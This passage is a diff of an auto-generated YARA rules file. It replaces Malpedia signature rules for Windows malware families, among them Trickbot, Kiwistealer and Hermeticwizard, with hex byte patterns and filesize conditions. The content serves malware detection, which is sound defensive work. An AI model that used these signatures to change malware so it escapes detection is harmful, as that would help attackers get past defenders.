+		$sequence_1 = { 48833d????????00 7405 e8???????? 48833d????????00 7417 488d4dd0 ff15???????? }
+		$sequence_2 = { 488b9c2490000000 0f57c0 4d8bf0 488bea 0f1103 0f114310 48894320 }
+		$sequence_3 = { 66480f6ec2 0f16c0 0f1101 4c03c1 4883c110 4883e1f0 }
+		$sequence_4 = { 488945d8 488d442420 f30f7f45e4 c745e003500000 0f1005???????? }
+		$sequence_5 = { ff15???????? 488b0d???????? 488d842498000000 4889442430 33d2 48895c2428 }
+		$sequence_6 = { 488364243800 498bd8 488364245000 488bfa 488bf1 33d2 }
+		$sequence_7 = { 4881c490000000 5b c3 4055 53 56 57 }
+		$sequence_8 = { 4983f84f 7350 4d8bc8 4983e1f8 }
+		$sequence_9 = { 0f100d???????? 83a5a000000000 488d542460 488b0d???????? 4533c9 f30f7f45a0 }
 
 	condition:
-		7 of them and filesize < 327680
+		7 of them and filesize < 99328
 }
-rule MALPEDIA_Win_Slave_Auto : FILE
+rule MALPEDIA_Win_Get2_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9b0051d5-869a-52df-9d63-5531f0ea1bc8"
+		id = "7a0226d0-f79d-5836-a967-6167cb32e47b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slave"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.slave_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.get2"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.get2_auto.yar#L1-L165"
 		license_url = "N/A"
-		logic_hash = "523de3cfcbf6b6abf4a7273f5bce657ee9b1b72d0e892b1b3170df330ecf9a83"
+		logic_hash = "848d65ded147178f011a1ef08b3d4ca3bdaaa4bd6535c16bb052e44171fc3a23"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102718,32 +102955,38 @@ rule MALPEDIA_Win_Slave_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 837df400 0f84f7250000 b80a000000 66894706 8a4704 24c3 }
-		$sequence_1 = { 0c10 888694030000 eb8d 817b0800000040 0f85ea020000 8a9694030000 8a5c240e }
-		$sequence_2 = { 813e6f563412 7406 5e 33c0 5b 5d c3 }
-		$sequence_3 = { 833d????????00 c705????????00000000 740a b9???????? e8???????? 833d????????00 c705????????00000000 }
-		$sequence_4 = { 3d00000001 0f8456030000 3d00000002 0f859a240000 }
-		$sequence_5 = { 837f7401 894de8 7620 83bf8400000000 7417 8b8780000000 0345f4 }
-		$sequence_6 = { 8bc8 83c408 3bd9 750b }
-		$sequence_7 = { 83c40c 028e08010000 888e08010000 80f9ff 730c 0fb6c1 }
-		$sequence_8 = { 7307 0fb6c2 2bc8 eb02 33c9 0fb6c2 68???????? }
-		$sequence_9 = { ff15???????? 5f 5e c3 837e1800 7445 90 }
+		$sequence_0 = { e8???????? 8b4508 8be5 5d c20400 68d0000000 b8???????? }
+		$sequence_1 = { 0f849e000000 807d0c00 0f859a000000 f6c104 }
+		$sequence_2 = { 8bf1 8975d0 33ff 8975cc }
+		$sequence_3 = { 8b4508 660f6ec1 f30fe6c0 c1e91f 51 51 660f6ec8 }
+		$sequence_4 = { 8d55d8 8d8d24ffffff e8???????? 59 8bc8 }
+		$sequence_5 = { 83e017 89410c 8b4910 23c8 0f849e000000 807d0c00 }
+		$sequence_6 = { 895dfc e8???????? c645fc02 eb0b 8d45d8 }
+		$sequence_7 = { 897e04 897e08 33db c745ec07000000 }
+		$sequence_8 = { 488d7b38 488d05a6020200 483947f0 741a 488b0f 4885c9 }
+		$sequence_9 = { 4863c8 488b4308 48894cd008 483b6b10 0f83ba010000 }
+		$sequence_10 = { 488d8c24f0020000 e8???????? 90 418bd5 488d8c2470040000 }
+		$sequence_11 = { 488d4c2450 e8???????? 498bcc e8???????? 4c8b642468 }
+		$sequence_12 = { eb0f 49394e10 720b bb02000000 895c2420 }
+		$sequence_13 = { 440f45e8 410fb6dd 4c8b7df0 498bcf ff15???????? eb0d }
+		$sequence_14 = { 488d0503b20200 488bd9 488901 f6c201 740a }
+		$sequence_15 = { 4c8d0510e00100 488d15c9a40100 e8???????? 488bd8 }
 
 	condition:
-		7 of them and filesize < 532480
+		7 of them and filesize < 720896
 }
-rule MALPEDIA_Win_Hermeticwizard_Auto : FILE
+rule MALPEDIA_Win_Soundbill_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a90e0914-4bb5-5c18-8701-049f4c06d7e8"
+		id = "fc6eb91d-5824-524d-bbb8-b5d2b50f1e71"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwizard"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hermeticwizard_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbill"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.soundbill_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "942915314ef1e17eaccf9202ed3b81b64aa22d4533742c599cd868661ae4ab21"
+		logic_hash = "23246153789cca2dc7fd1119b61492f6729a30eebbbf9247088b38725417e92a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102757,32 +103000,32 @@ rule MALPEDIA_Win_Hermeticwizard_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6800080000 50 e8???????? 83c410 85c0 }
-		$sequence_1 = { 1bdb 83cb01 85db 0f94c0 }
-		$sequence_2 = { 6685db 7415 668b5902 663b5f02 750f 83c104 83c704 }
-		$sequence_3 = { 6689853effffff 66898540ffffff 33c0 66898542ffffff 8b45f8 66898d16ffffff }
-		$sequence_4 = { 3bc7 7442 8b35???????? 83c008 50 }
-		$sequence_5 = { 57 8bf1 8bfa 68???????? 56 ff15???????? 85c0 }
-		$sequence_6 = { 894310 8b45f0 c745ec989d0110 8d1486 }
-		$sequence_7 = { 7410 68???????? 8bce e8???????? 59 894308 }
-		$sequence_8 = { 668b4104 663b4204 750b 8b4108 3b4208 7503 }
-		$sequence_9 = { 50 e8???????? 3b30 7533 8b45fc }
+		$sequence_0 = { 55 56 4881ecb0030000 488b05???????? 4833c4 4889842470030000 488b8424f0030000 }
+		$sequence_1 = { 488b8da0000000 e8???????? 4883c420 5d c3 488d8a70000000 e9???????? }
+		$sequence_2 = { 750e 85c9 0f95c0 8806 83f901 760c eb03 }
+		$sequence_3 = { 48894a08 488d4808 e8???????? 488d0579b00200 488903 488bc3 4883c420 }
+		$sequence_4 = { f20f5ce9 f2410f1004c1 488d15562b0100 f20f1014c2 }
+		$sequence_5 = { c644243001 44397c2440 7f10 ff442434 4885c9 7426 c644243c01 }
+		$sequence_6 = { 483305???????? 488d1516b70200 488bcb 488905???????? ff15???????? 483305???????? }
+		$sequence_7 = { ffd7 4c8bf0 4885c0 751e 498bcf ff15???????? 488bce }
+		$sequence_8 = { 418d542416 488d0d3f4b0100 e8???????? 488b0b 66443921 488bcb 744d }
+		$sequence_9 = { 8b4018 25c0010000 83f840 0f84e7010000 }
 
 	condition:
-		7 of them and filesize < 263168
+		7 of them and filesize < 973824
 }
-rule MALPEDIA_Win_Karagany_Auto : FILE
+rule MALPEDIA_Win_Hemigate_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3572ccbc-1c3c-5c06-9653-09cc26e9f425"
+		id = "7f247b7a-51fa-56b6-b5ca-706ac00fbf7d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.karagany_auto.yar#L1-L111"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hemigate"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hemigate_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "7b1e13963414e6b2e1af9eb1a6f96423af34e9bc7a849bda8fce35a0e1356973"
+		logic_hash = "05c380bd4c229bd57061005a2f77b730cb7f642aa2a7c3aed0193470cbd60a00"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102796,32 +103039,32 @@ rule MALPEDIA_Win_Karagany_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8945d0 8945d8 8945e0 8945e8 8945ec 8945f4 }
-		$sequence_1 = { 8bf8 6a03 57 ffd6 }
-		$sequence_2 = { 57 8bf8 6a03 57 }
-		$sequence_3 = { 8945d8 8945e0 8945e8 8945ec 8945f4 }
-		$sequence_4 = { 6a40 6800300000 6800000300 6a00 }
-		$sequence_5 = { 8b4508 0526f8ffff 69c06c010000 034510 }
-		$sequence_6 = { 8bec 81ec60060000 53 56 57 33c0 }
-		$sequence_7 = { ff15???????? 6a00 53 68???????? }
-		$sequence_8 = { 68???????? 8d85a4fdffff 50 ffd6 68???????? }
-		$sequence_9 = { 8bd8 2bc7 40 50 57 }
+		$sequence_0 = { 85f6 0f8597000000 8bd3 8d4ddc e8???????? 8bf0 85f6 }
+		$sequence_1 = { c1e208 0bd1 0fb64f06 3155a8 0fb65707 c1e208 0bd1 }
+		$sequence_2 = { c3 ff75f4 ff36 ff15???????? 8bf0 83c408 85f6 }
+		$sequence_3 = { 8b550c 8d45d4 50 8d8fa8000000 e8???????? 8b55cc 8d8fb8110100 }
+		$sequence_4 = { 83f801 0f85b8000000 ffb55cf7ffff ffd3 0fb7c0 8d9554f7ffff 6a02 }
+		$sequence_5 = { c1c919 33c8 8b75ec 8bc7 8b7de8 c1c806 33c8 }
+		$sequence_6 = { c1e903 f7e1 56 c1ea03 33f6 8d0492 03c0 }
+		$sequence_7 = { eb48 b840000000 8bfb 2bc1 3bd8 0f43f8 8d462c }
+		$sequence_8 = { 0f84a4f4ffff 8b45c8 0345c4 53 50 51 e8???????? }
+		$sequence_9 = { 8d742418 8bf8 f3a5 8143080c020000 e9???????? 8d4c2418 51 }
 
 	condition:
-		7 of them and filesize < 180224
+		7 of them and filesize < 991232
 }
-rule MALPEDIA_Win_Alpc_Lpe_Auto : FILE
+rule MALPEDIA_Win_Webc2_Head_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9201dab6-c827-5ba9-b6a2-6cc5f0b64e34"
+		id = "2d2a730d-97a8-5241-8842-4f785d02a551"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alpc_lpe"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.alpc_lpe_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_head"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_head_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "f47b6095e2a1dadfd3fc285c90742ae34b69859fcd8b2fa148af803fa48f9175"
+		logic_hash = "de901b0b98bf3f5b5c73a555d4c5ec984c92ea5b4ae983fcd4805edfd4129476"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102835,32 +103078,32 @@ rule MALPEDIA_Win_Alpc_Lpe_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c9 0f1f440000 0fb70429 4883c102 6689440ffc 6685c0 }
-		$sequence_1 = { 48894540 c7455040000000 48c7454800000000 48c7455800000000 48c7456000000000 48c785c800000000000000 c785e800000000000000 }
-		$sequence_2 = { 488bfc b932000000 b8cccccccc f3ab 488b8c24e8000000 488b85e0000000 488b4008 }
-		$sequence_3 = { 488b8d00010000 e8???????? 488b8dd8000000 488bd1 488bc8 e8???????? }
-		$sequence_4 = { 488d1d5c8e0000 8bf7 488b2b 4885ed 741b 837b0801 7415 }
-		$sequence_5 = { 488bec 488bfc b932000000 b8cccccccc f3ab 488b8c24e8000000 488b85e0000000 }
-		$sequence_6 = { 488b8d08010000 488908 48837d0800 7418 488b8d00010000 e8???????? }
-		$sequence_7 = { 83f8ff 7526 4c8d2587860000 493bdc }
-		$sequence_8 = { b8cccccccc f3ab 488b8c24e8000000 488b85e0000000 48c70000000000 488b85e0000000 488da5c8000000 }
-		$sequence_9 = { 4c8b8500010000 488bd0 488d0d60b20000 e8???????? 48894508 8b4508 8bf8 }
+		$sequence_0 = { a4 8d049500000000 8d0c52 89442418 894c2438 8b44241c 8b00 }
+		$sequence_1 = { 735a 8bc8 83e01f c1f905 8b0c8d40cb4000 }
+		$sequence_2 = { 0f8550ffffff 8b542424 8b4c241c 3bd1 0f8dc9000000 2bca }
+		$sequence_3 = { 83c40c f2ae f7d1 49 894c2414 7511 bf???????? }
+		$sequence_4 = { 0fb6fa 3bc7 7714 8b55fc 8a9220994000 }
+		$sequence_5 = { f2ae f7d1 49 51 68???????? 50 50 }
+		$sequence_6 = { 8d9e38994000 803b00 8bcb 742c }
+		$sequence_7 = { f7d1 49 68???????? 68???????? 894c2438 e8???????? }
+		$sequence_8 = { f3ab 68???????? e8???????? 6a03 68???????? 68???????? }
+		$sequence_9 = { 8b6c2424 884603 83c604 89742410 8bde }
 
 	condition:
-		7 of them and filesize < 540672
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Supper_Auto : FILE
+rule MALPEDIA_Win_Kiwistealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "15a5fdcc-983f-545a-acdb-1425e0080fb1"
+		id = "7bc76ddb-b6a4-53dd-88a7-f41bc1cc2494"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.supper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.supper_auto.yar#L1-L164"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kiwistealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kiwistealer_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "609470a8924c4445e40bf6082d5cbc00c8d1a1556bb0036cf2444493aad439fc"
+		logic_hash = "27341d3fac694e410d992d38e84f32a2cf2b6688bb4c9bbb3f17b7cb4866a5bf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102874,38 +103117,32 @@ rule MALPEDIA_Win_Supper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { baffffffff 89cb 488b0d???????? ff15???????? }
-		$sequence_1 = { 74ed 8844242f e8???????? 0fb644242f 48c705????????00000000 4883c438 }
-		$sequence_2 = { 488905???????? e8???????? 84c0 7407 4883c438 5b }
-		$sequence_3 = { 488905???????? ffd6 48891d???????? 488905???????? }
-		$sequence_4 = { 4889cb 31c9 ffd6 4531c0 31d2 31c9 }
-		$sequence_5 = { 488905???????? 31c0 4883c428 5b 5e c3 }
-		$sequence_6 = { ba01000000 4c8b25???????? 41ffd4 85c0 }
-		$sequence_7 = { 4531c0 488b4b08 ba01000000 41ffd4 85c0 }
-		$sequence_8 = { e8???????? 488b4510 488b00 4885c0 }
-		$sequence_9 = { 0fb700 0fb7d0 488b85c0000000 4883c004 4189d0 }
-		$sequence_10 = { 66894510 c645ff00 488b05???????? baffffffff }
-		$sequence_11 = { 4883bdc000000000 750a b800000000 e9???????? 488b85c0000000 }
-		$sequence_12 = { ba04000000 4889c1 e8???????? 488b85e0000000 }
-		$sequence_13 = { 4889c1 e8???????? 8b45dc 89c0 4889c1 e8???????? }
-		$sequence_14 = { c744242004000000 4989d1 41b801000000 ba06000000 4889c1 e8???????? }
-		$sequence_15 = { c3 55 4881ec50010000 488dac2480000000 48898de0000000 488b85e0000000 0fb7400c }
+		$sequence_0 = { 4585c9 7462 4183e901 740f 4183f901 0f85d6000000 }
+		$sequence_1 = { 4885c0 740e 488d7027 4883e6e0 488946f8 eb14 ff15???????? }
+		$sequence_2 = { 488b05???????? 4885c9 480f45c1 483b05???????? 747e 4c8bc6 488d542470 }
+		$sequence_3 = { 0f118424b0020000 0f104810 0f118c24c0020000 4c896010 48c740180f000000 c60000 4c8d8c2458030000 }
+		$sequence_4 = { e9???????? 4983c5c0 4c896c2428 493bdc 0f85bc000000 4983ee40 4c89742420 }
+		$sequence_5 = { e8???????? 43c6042e00 4533f6 488d45d8 48837df010 480f4345d8 4c89742438 }
+		$sequence_6 = { 488b05???????? 488905???????? 488d0d3d110200 e8???????? 8bc8 486bc10b 83f803 }
+		$sequence_7 = { 0f118590000000 418d4c2440 e8???????? 488bd8 4889442428 33d2 488bc8 }
+		$sequence_8 = { 41c70005000000 49894008 498bc0 41c6400401 c3 8bca 81e9d4040000 }
+		$sequence_9 = { 4883ec70 488bf9 4533f6 44897098 488d2db0920000 488968a0 0f57c0 }
 
 	condition:
-		7 of them and filesize < 517120
+		7 of them and filesize < 403456
 }
-rule MALPEDIA_Win_Miragefox_Auto : FILE
+rule MALPEDIA_Win_Poldat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "845d5292-b7ea-5816-ae3f-26f365bc2587"
+		id = "42cee7c4-4091-565d-9c3d-72814a243e33"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miragefox"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.miragefox_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poldat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.poldat_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "3f9732b4e7f509d0ad8d4d1803424245eb1ca2a613f2fd892ba39e0af22d7971"
+		logic_hash = "623b16e441bfe440967c1ef70315e2275e1dcbf3de26c2e6e7dae46aecf0c483"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102919,32 +103156,32 @@ rule MALPEDIA_Win_Miragefox_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8945ca 8b45f4 83c036 66c745c8424d }
-		$sequence_1 = { 8b45e0 8b4df4 53 50 8d440828 50 }
-		$sequence_2 = { 8a8010132a00 83e00f eb02 33c0 0fbe84c130132a00 c1f804 }
-		$sequence_3 = { 8d45fc 50 e8???????? 59 8d44180c }
-		$sequence_4 = { 57 8d859c7cffff 6a00 50 e8???????? 57 }
-		$sequence_5 = { 2900 59 352900be35 2900 3236 2900 98 }
-		$sequence_6 = { 83c418 8d45ec 53 50 8d857cbcffff }
-		$sequence_7 = { 85c0 0f84be000000 8d85c0feffff 50 8d85b8fcffff 68???????? 50 }
-		$sequence_8 = { 83c01f 894d8c 99 59 8b75b8 f7f9 8b4df4 }
-		$sequence_9 = { 8d45f0 8975ec 50 8d45f8 }
+		$sequence_0 = { e8???????? 8b4514 83c410 8906 8b4510 }
+		$sequence_1 = { c74724c0324000 8b4c2418 83f9ff 750c c744241806000000 8b4c2418 }
+		$sequence_2 = { 89be4c0c0000 89be500c0000 89be540c0000 8bc6 5f }
+		$sequence_3 = { 8b4720 895718 3bc2 750a c74720a0324000 }
+		$sequence_4 = { 8d888c000000 8d9080090000 8988100b0000 8d88740a0000 8988280b0000 33c9 c780180b000018b24100 }
+		$sequence_5 = { 50 e8???????? 55 8d86bc0a0000 57 50 c786b80a0000901f0000 }
+		$sequence_6 = { 8bc7 83e007 83ed03 8b148dbc9c4100 }
+		$sequence_7 = { c3 55 8bec 81ec68040000 8065fc00 53 56 }
+		$sequence_8 = { 2bc8 03c7 51 6a00 8d441804 50 }
+		$sequence_9 = { 50 e8???????? 59 e8???????? 6a04 99 }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 247808
 }
-rule MALPEDIA_Win_Webc2_Bolid_Auto : FILE
+rule MALPEDIA_Win_Pslogger_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d7b8b0f8-fb67-56c4-b24d-dcdab9f7b909"
+		id = "7125bcf7-61fe-59fe-bcb6-1726a032b5b5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_bolid"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_bolid_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pslogger"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pslogger_auto.yar#L1-L166"
 		license_url = "N/A"
-		logic_hash = "a9749882fbe9a2a48ffae4420a547a6fbd11851e4362f65200b42858f5a2933e"
+		logic_hash = "f827a0de7cefc58a148c7605b546e1b2c29f64eac98a4dd15fd09ff9985d232c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102958,34 +103195,40 @@ rule MALPEDIA_Win_Webc2_Bolid_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7f31 8b8bc8000000 8b93c4000000 6a00 41 6a00 }
-		$sequence_1 = { e8???????? 84c0 7427 8bcf 8b7b70 8d436c 8bd1 }
-		$sequence_2 = { 8b55ec 8d8d54ffffff 51 52 50 8d45a0 50 }
-		$sequence_3 = { e8???????? 8bd8 3bde 0f8e0c060000 8a451b 56 8d8d58ffffff }
-		$sequence_4 = { 83c40c 8b15???????? 8d4de4 52 }
-		$sequence_5 = { 8b4dec 8b75e4 03c1 894508 }
-		$sequence_6 = { fec8 8801 eb09 51 e8???????? 83c404 8b7db8 }
-		$sequence_7 = { 50 c3 6a02 e8???????? 59 c3 }
-		$sequence_8 = { 8a01 4a 0fb6f0 f6860132410004 8807 7413 47 }
-		$sequence_9 = { c68424240200000d e8???????? 83ec10 8d9424a0000000 8bcc 89a424c4000000 52 }
+		$sequence_0 = { e8???????? 8bc8 e8???????? 4863f0 }
+		$sequence_1 = { 4885c9 7406 ff15???????? 4883c318 }
+		$sequence_2 = { 8d4601 4863e8 488bcd e8???????? }
+		$sequence_3 = { 483bc8 740e 4885c9 7406 }
+		$sequence_4 = { ff15???????? b801000000 488b8c2488000000 4833cc e8???????? }
+		$sequence_5 = { 498bcc e8???????? 33d2 41b8b80b0000 498bcc }
+		$sequence_6 = { c3 488b0d???????? 33d2 ff15???????? 488b0d???????? 33d2 ff15???????? }
+		$sequence_7 = { b910000000 ff15???????? 6685c0 7910 b914000000 ff15???????? 6685c0 }
+		$sequence_8 = { 895c2414 ff35???????? ffd6 e9???????? 85c9 }
+		$sequence_9 = { 8bf0 83c408 85f6 0f84e8000000 8bce 8d5101 }
+		$sequence_10 = { 85c0 7e25 66660f1f840000000000 8894373d1c0000 b801000000 }
+		$sequence_11 = { 393b 0f45f8 33c9 89bd58fbffff 0f1f4000 }
+		$sequence_12 = { 6bc830 8b049588b14200 f644082801 7414 8d4508 8945fc 8d45fc }
+		$sequence_13 = { 68???????? 50 e8???????? 8d842470030000 68???????? 50 e8???????? }
+		$sequence_14 = { 85c0 0f8568fcffff 668b8594fbffff 83431810 }
+		$sequence_15 = { 58 668906 8b048d88b14200 6a0a 8854382a }
 
 	condition:
-		7 of them and filesize < 163840
+		7 of them and filesize < 475136
 }
-rule MALPEDIA_Win_Farseer_Auto : FILE
+rule MALPEDIA_Win_Trickbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a66e9913-f269-5edc-a360-d1e8d3201a95"
+		id = "7dec44a5-ed16-520b-98af-bb6c41308144"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.farseer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.farseer_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.trickbot_auto.yar#L1-L647"
 		license_url = "N/A"
-		logic_hash = "a0cc6c15e80fbd6ad14902af9a89ab7d523ee3b95c547b4caf6b73d387698705"
+		logic_hash = "2410d16d7ee16128151b288938666126105e8a07f0144c47c922a04a3e6d63dc"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -102997,32 +103240,100 @@ rule MALPEDIA_Win_Farseer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b46f4 8b4804 c74431f49c064200 8b56fc 8b4204 c74430fc???????? 8b4ef4 }
-		$sequence_1 = { 8b4d0c 8bfb e8???????? 8b4c2414 8b3d???????? }
-		$sequence_2 = { 68???????? 8d4c2440 c74424580f000000 c744245400000000 c644244400 e8???????? }
-		$sequence_3 = { 8b7d14 8bc7 3bc7 7300 8bd7 83ff01 7205 }
-		$sequence_4 = { 51 c78424a000000002000000 e8???????? 68???????? 8d542450 52 }
-		$sequence_5 = { ffd5 85c0 7e2f 03f0 81fe00040000 7ce1 33c0 }
-		$sequence_6 = { 6a00 51 c684241409000000 e8???????? 83c40c 8dbc2408090000 }
-		$sequence_7 = { ff15???????? 6804010000 8d54245a b901000000 52 }
-		$sequence_8 = { 8d048520634200 83e31f 8985e4efffff 8b00 c1e306 03c3 8a4824 }
-		$sequence_9 = { 64890d00000000 59 5f 5e 5d 5b 8b8c24a0020000 }
+		$sequence_0 = { 1bc0 83e020 83c020 eb36 }
+		$sequence_1 = { 83c010 eb25 a900000040 7411 2500000080 f7d8 1bc0 }
+		$sequence_2 = { eb36 2500000080 f7d8 1bc0 83e070 83c010 eb25 }
+		$sequence_3 = { f7d8 1bc0 83e002 83c002 eb0d 2500000080 f7d8 }
+		$sequence_4 = { 8b07 a900000020 7429 a900000040 }
+		$sequence_5 = { c705????????fdffffff c705????????feffffff c705????????ffffffff e8???????? }
+		$sequence_6 = { 895df8 895df4 895dec 66c745f00005 895dfc }
+		$sequence_7 = { 8902 3bcb 7507 5f 5e }
+		$sequence_8 = { 8d1489 8d0cd0 8b4114 2b410c }
+		$sequence_9 = { 41 83c028 3bce 7ce9 }
+		$sequence_10 = { 1bc0 83e007 40 8b4fe8 }
+		$sequence_11 = { 488b5118 4889442440 488b4148 4889442438 }
+		$sequence_12 = { 488b4138 4889442428 488b4130 488b4910 4889442420 41ffd2 }
+		$sequence_13 = { 4c8b4120 488b5118 4889442438 488b4140 }
+		$sequence_14 = { 488b01 4c8b4120 488b5118 488b4910 }
+		$sequence_15 = { 488b01 488b5118 488b4910 ffd0 }
+		$sequence_16 = { 488b4148 4c8b11 4c8b4928 4c8b4120 488b5118 }
+		$sequence_17 = { 488b4148 4889442438 488b4140 4889442430 488b4138 4889442428 488b4130 }
+		$sequence_18 = { 48397c2430 0f94c3 8bc3 488b5c2450 4883c440 }
+		$sequence_19 = { 6644891b 664183fb1a 7307 664183c341 eb13 }
+		$sequence_20 = { 83780400 7404 8b4008 c3 }
+		$sequence_21 = { 2bc2 d1e8 03c2 c1e806 6bc05f }
+		$sequence_22 = { 6820bf0200 68905f0100 68905f0100 50 }
+		$sequence_23 = { 51 68e9fd0000 50 e8???????? }
+		$sequence_24 = { 6a40 6800300000 6a70 6a00 }
+		$sequence_25 = { 8d440002 6a00 50 e8???????? }
+		$sequence_26 = { c3 6a01 ff15???????? 50 }
+		$sequence_27 = { 85c0 7f0b e8???????? 8b05???????? }
+		$sequence_28 = { e8???????? 83f801 7411 ba0a000000 }
+		$sequence_29 = { 8b45f8 5f c60000 2b450c 5e }
+		$sequence_30 = { 8b01 59 03d0 52 ebdc 89450c }
+		$sequence_31 = { 8bc1 66ad 85c0 741c }
+		$sequence_32 = { 50 8b450c ff4d0c ba28000000 f7e2 }
+		$sequence_33 = { 7405 e8???????? ff15???????? 8bc3 }
+		$sequence_34 = { ff5508 8b5510 8b4a04 ff5508 50 51 }
+		$sequence_35 = { 2bc1 8b00 3bc7 72f2 }
+		$sequence_36 = { ff5508 58 894514 8b5510 }
+		$sequence_37 = { 03d0 895510 8b4a04 ff5508 8b5510 8b4a0c }
+		$sequence_38 = { c1e102 2bc1 8b00 894508 }
+		$sequence_39 = { 85c0 741c 3bc1 7213 }
+		$sequence_40 = { 3bc1 7703 894df4 8b47fc }
